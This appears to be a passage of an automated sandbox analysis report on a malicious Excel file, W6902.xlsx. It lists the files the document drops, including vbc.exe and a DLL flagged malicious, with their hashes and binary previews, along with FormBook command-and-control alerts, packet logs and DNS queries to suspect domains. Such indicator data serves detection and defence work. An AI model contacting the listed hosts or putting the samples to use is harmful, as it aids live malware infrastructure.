                                                      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                                      Malicious:false
                                                      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6EBE05.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):3747
                                                      Entropy (8bit):7.932023348968795
                                                      Encrypted:false
                                                      SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                      MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                      SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                      SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                      SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                      Malicious:false
                                                      Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                                                      C:\Users\user\AppData\Local\Temp\mgyagjb

                                                      Download File
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5249
                                                      Entropy (8bit):6.1160379955388935
                                                      Encrypted:false
                                                      SSDEEP:96:HE4FTINLY3hqAntRxvviaXlUvIz51HicLVHpoGr8m0uTfKo234O1pLF:LONLMhqAnTxvvia0K39pNrn0MSo2344F
                                                      MD5:61327A82DC5ACFC628A9DDC93B1EDC0A
                                                      SHA1:63C2213EA0752D4CD33BC4CD26BE1F6A5D5A5A4D
                                                      SHA-256:1408C1FF01630D3A5FBAE695DB2B399CBDA3C4B4B43DB12B80AC8DB5C294A899
                                                      SHA-512:CCF6C11A894171BE04737442D3BE0F4A843679B1D7E18E3458EBB74768FAB441522C4AA34FF877A50C902501EC68744A43747187BF23A284EF07E94832312212
                                                      Malicious:false
                                                      Preview:..Voo..........x.o^./y^b..^./y^b...xgo..k7ooo.x.on.[n._..g..pooo....n.[n._..g...ooo...#n.[n._..g.."ooo....n.[n._..g..1ooo./.3.._s.mW.z/rr.[......_..sB........k.s$B.m_|f...r.k.s%.k...x....mB.oooo.sSX.:xkn..|n..}n....n./.|n...n....i._v..[fv...O..d..n...}.W^X..rxk.oooo..SsRooo.sS`..x...........%[o.....^./y^b.g.W.o..[.O.W.o._.c$.g.$s.k.W.o..W.d.g.k...%[owI]....eoo..eoo%cowyn...yeoo..eoo%Wow`.....eoo..eoo%Wo.....7^./y^b....g_ooo....k..go.I.k.oo.k..k.g..g...cXoo./...W.mW|z.o.`..`.....mW|$.o.`..`.memW.z/o.X..wyn....doo..!pnn...^....n.W..nnn.....o.Y.x.o.V...dooo.....%so......^./y^b....g7ooo../.k..go.I.k.oo.k..k.g..g....soo./^..ooo.W.mW|z.o.`/.`3.[.mW|$.o.`/.`3._.mW|...`/.`3.cB.mW}z.r.H/.H3....mW|$.e.`/.`3mXmW.z/o.X/.wI]....ooo...knn....Go.W...G.d.Fn.Gn.cn._n.[n.W..qnn.....o.Y.x.o.V...dooo.....%co.....K..g_ooo....k..go.I.k.oo.k..k.g..g...mroo./...W.mW|z.o.`..`..[.mW|$.o.`..`.memW.z/o.X..w`....6ooo..Sknn...an.

                                                      C:\Users\user\AppData\Local\Temp\nsjBE60.tmp

                                                      Download File
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):265931
                                                      Entropy (8bit):7.698831475857815
                                                      Encrypted:false
                                                      SSDEEP:6144:yXhg4DlE7dYexg5uqPw9CNu4dvSX0G99R+1KWGUDw:D4BEJYeyxgCNl5i0GYSU
                                                      MD5:C02929E25042F9942FF27C1DB38973E3
                                                      SHA1:86AA91161B74491FA9F8F9FC8D8EE0A0FCF22ED8
                                                      SHA-256:ADD5757B03B27815F1B5A2E900C2995E7A077E5E46AFD6CE5E57953888F19156
                                                      SHA-512:0C6A051D6B6270ED1CB77C104FAC5731A71D8D44933A0CDA7DC0D88A65A30221F732F3D457A9CF8311848394A9F20E3B733802BCF1E3F26A28FE5E9B39219AA4
                                                      Malicious:false
                                                      Preview:.Y......,.......................,C.......X......yY..........................................................................................................................................................................................................................................J...............o...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\nsjBE61.tmp\npsx.dll

                                                      Download File
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):20992
                                                      Entropy (8bit):5.741923007087739
                                                      Encrypted:false
                                                      SSDEEP:384:i46PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbof3b:i4G1albrXY0HwinMdZeUhbovb
                                                      MD5:FF94AC3A49E4C0BCDF0C1FE9730293D9
                                                      SHA1:2F81D5B8EC6515FBDFA099EABB0BABF9D6C40B97
                                                      SHA-256:4D2A5F508E4D6A54D71AF82FCEA978527CDD216423FB050457DFEB4DB581178F
                                                      SHA-512:01F8BC3AC735473C60E842D76D282F4859FD9FECADA580BFFC629A8127A821A0839ED832143C7034B3A1E3DFCA9561841626F0B8FBE582CB6A0E7DAB453A5A16
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 46%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0..0..Mn...0..Mn...0..Hn...0..Mn...0..Rich.0..................PE..L...a..a...........!.....@...................P............................................@.........................0Q..H...xQ.......`.......................p.......................................................P..0............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.rsrc........`.......N..............@..@.reloc.......p.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\wgtx82tpscdlgb4zlyrg

                                                      Download File
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):216745
                                                      Entropy (8bit):7.992922002092465
                                                      Encrypted:true
                                                      SSDEEP:6144:dhg4DlE7dYexg5uqPw9CNu4dvSX0G99R+1f:g4BEJYeyxgCNl5i0GYN
                                                      MD5:1FABB2AB23318AC4B366E2FFB75034DD
                                                      SHA1:A2ADE2676E8FA328D4A8C3640AE9BA14334BC2B2
                                                      SHA-256:FAE6FF46EBDC2CFE9DBADD442892F2B569D048CFB4BCC560E32D501DD4A03F96
                                                      SHA-512:6FDF083748944B9A00A2D4C57B1B832AE45C7A5E845A074890BBDADBD94967DC255EEDE9BEEDEA45CE4355E4AEE8567A42D54B85A06393A41D762E37134DB662
                                                      Malicious:false
                                                      Preview:.W.m.G.Q...w..*.9..;.1h.....G"...z*.6k......*..i.e.%.].,...-......k......n.I..M...j..j>...`.kA\w....4....>.D.e..3.........,..D<."+.$..^.]wl.*..>..^E..l..P._...QN0A.o.........N.3.....K';M.+L.......(P&.Go`...|nrJJ3.+..Q:n..]L..s.p...`pf..#.0......P2:.dG.Q..........]..,\....G"..}.z..6k...I..*..i.e.%.].,.^.-............>.5M{.K.B0..{..:|..o1W.<.2n...c...M.d6............,..U...x(.&.{.._..........SbWij<..2&.g.`eiZ.+.x......3..#..t.MEU...w.....(*&6........rJJ3.+...]...L...f.p.w.`.f.!#..........2D.dG.Q....x......W...\.O..3G"...z*.6k......*..i.e.%.].,.^.-............>.5M{.K.B0..{..:|..o1W.<.2n...c...M.d6............,..U...x(.&.{.._..........SbWij<..2&.g.`eiZ.+.x....N.3.Q...|.MEW.........(*&6......nrJJ3.+...]...L...f.p.w.`.f.!#..........2D.dG.Q....x......W...\.O..3G"...z*.6k......*..i.e.%.].,.^.-............>.5M{.K.B0..{..:|..o1W.<.2n...c...M.d6............,..U...x(.&.{.._..........SbWij<..2&.g.`eiZ.+.x....N.3.Q...|.MEW.........(*&6......nrJJ3.+...]...L.

                                                      C:\Users\user\AppData\Local\Temp\~DF053AF007E74E92C3.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\~DF1370C3F6023AC29F.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:CDFV2 Encrypted
                                                      Category:dropped
                                                      Size (bytes):191880
                                                      Entropy (8bit):7.958354274541763
                                                      Encrypted:false
                                                      SSDEEP:3072:C8Sc+d6FVAVpIxRM/+fY89ahUriG65R1UAErtnNz39U/NjnFhayD0BbR6Q:rbnyVpIrqOYGV6NUA2Nra/lFhD49IQ
                                                      MD5:9A0E6F87707210A385EF8ED3BF348DE3
                                                      SHA1:800A9F004B17CD24413EB98C2F6D9FCD02128887
                                                      SHA-256:41B58CDDCA86E32E7034DAF8E97DCDAA04AC6CDCB41EAE86BE1C3FA7FD05C871
                                                      SHA-512:E35A536E9D68DA1CC14EA854D977490ED6865CC756C23D479D6A37572F004C2F6B0AB475C9F765434588C827721B3FBC72CF5A33CF6144B92FC205BDC7A96269
                                                      Malicious:false
                                                      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                      C:\Users\user\AppData\Local\Temp\~DF4ACF9BE7D0DFD87B.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\~DF9B5A417AA5C9FB99.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\Desktop\~$W6902.xlsx

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):165
                                                      Entropy (8bit):1.4377382811115937
                                                      Encrypted:false
                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                      Malicious:false
                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                      C:\Users\Public\vbc.exe

                                                      Download File
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):254186
                                                      Entropy (8bit):7.930341504736443
                                                      Encrypted:false
                                                      SSDEEP:6144:owKdM+LrFcBAEMQK74gFWVE2BvubTUe+xdemO+:uHLrODMV4zVfvubb+L1
                                                      MD5:C2CA2BA9C38EB02217588662717BA6C3
                                                      SHA1:8A897F24D2E564AF2C2FCC272AB0CFBEF10611B5
                                                      SHA-256:9AF4D9EF8B2A850854AE23411D44D3603147C26898BCA1010FD2F9B16F6D456E
                                                      SHA-512:7C7A80F37013B8B5FE27E0C9C3144884ABDE6CA49484C3E8C6CC78DAA9F3B6AC890577247223E7D4875B865244E8732840C6A47170FBE2C7F27406BA4C8F52A6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:CDFV2 Encrypted
                                                      Entropy (8bit):7.958354274541763
                                                      TrID:
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                      File name:W6902.xlsx
                                                      File size:191880
                                                      MD5:9a0e6f87707210a385ef8ed3bf348de3
                                                      SHA1:800a9f004b17cd24413eb98c2f6d9fcd02128887
                                                      SHA256:41b58cddca86e32e7034daf8e97dcdaa04ac6cdcb41eae86be1c3fa7fd05c871
                                                      SHA512:e35a536e9d68da1cc14ea854d977490ed6865cc756c23d479d6a37572f004c2f6b0ab475c9f765434588c827721b3fbc72cf5a33cf6144b92fc205bdc7a96269
                                                      SSDEEP:3072:C8Sc+d6FVAVpIxRM/+fY89ahUriG65R1UAErtnNz39U/NjnFhayD0BbR6Q:rbnyVpIrqOYGV6NUA2Nra/lFhD49IQ
                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                      File Icon

                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      01/28/22-22:38:38.511356TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.221.32.255.137
                                                      01/28/22-22:38:38.511356TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.221.32.255.137
                                                      01/28/22-22:38:38.511356TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.221.32.255.137
                                                      01/28/22-22:38:43.922128TCP1201ATTACK-RESPONSES 403 Forbidden804916737.123.118.150192.168.2.22
                                                      01/28/22-22:38:48.985672TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22194.5.156.29
                                                      01/28/22-22:38:48.985672TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22194.5.156.29
                                                      01/28/22-22:38:48.985672TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22194.5.156.29

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 28, 2022 22:37:20.837547064 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.867412090 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.867518902 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.867891073 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896116972 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896161079 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896184921 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896198988 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896209955 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896229982 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896234989 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896235943 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896239042 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896262884 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896275043 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896290064 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896295071 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896315098 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896326065 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896339893 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896348953 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896365881 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.896375895 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.896394014 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.909544945 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922305107 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922348022 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922373056 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922372103 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922398090 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922400951 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922405005 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922425032 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922435045 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922451973 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922456026 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922478914 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922486067 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922503948 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922509909 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922529936 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922539949 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922557116 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922569036 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922581911 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922585011 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922607899 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922616959 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922633886 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922652006 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922653913 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922667027 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922678947 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922683001 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922702074 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922712088 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922725916 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922728062 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922750950 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922760010 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922775984 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922784090 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922801971 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.922811031 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.922835112 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.923578978 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948632002 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948674917 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948700905 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948714018 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948725939 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948741913 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948746920 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948753119 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948762894 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948781013 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948793888 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948806047 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948828936 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948832035 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948843002 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948858976 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948860884 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948884010 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948894978 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948909044 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948909998 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948935986 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948945045 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948962927 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948971987 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948988914 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948997021 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.949012995 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.949022055 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.949037075 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.949048042 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.949063063 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.949074030 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.949085951 CET8049165212.192.246.120192.168.2.22

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 28, 2022 22:38:37.858086109 CET5216753192.168.2.228.8.8.8
                                                      Jan 28, 2022 22:38:38.171220064 CET53521678.8.8.8192.168.2.22
                                                      Jan 28, 2022 22:38:43.840178013 CET5059153192.168.2.228.8.8.8
                                                      Jan 28, 2022 22:38:43.863972902 CET53505918.8.8.8192.168.2.22
                                                      Jan 28, 2022 22:38:48.928319931 CET5780553192.168.2.228.8.8.8
                                                      Jan 28, 2022 22:38:48.960673094 CET53578058.8.8.8192.168.2.22
                                                      Jan 28, 2022 22:38:54.068027020 CET5903053192.168.2.228.8.8.8
                                                      Jan 28, 2022 22:38:54.113177061 CET53590308.8.8.8192.168.2.22
                                                      Jan 28, 2022 22:38:59.240909100 CET5918553192.168.2.228.8.8.8
                                                      Jan 28, 2022 22:38:59.272581100 CET53591858.8.8.8192.168.2.22
                                                      Jan 28, 2022 22:39:04.275386095 CET5561653192.168.2.228.8.8.8
                                                      Jan 28, 2022 22:39:04.464575052 CET53556168.8.8.8192.168.2.22

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Jan 28, 2022 22:38:37.858086109 CET192.168.2.228.8.8.80xc18cStandard query (0)www.927291.comA (IP address)IN (0x0001)
                                                      Jan 28, 2022 22:38:43.840178013 CET192.168.2.228.8.8.80xfc43Standard query (0)www.teentykarm.questA (IP address)IN (0x0001)
                                                      Jan 28, 2022 22:38:48.928319931 CET192.168.2.228.8.8.80x9c63Standard query (0)www.zoharfine.comA (IP address)IN (0x0001)
                                                      Jan 28, 2022 22:38:54.068027020 CET192.168.2.228.8.8.80x30e0Standard query (0)www.mollyagee.comA (IP address)IN (0x0001)
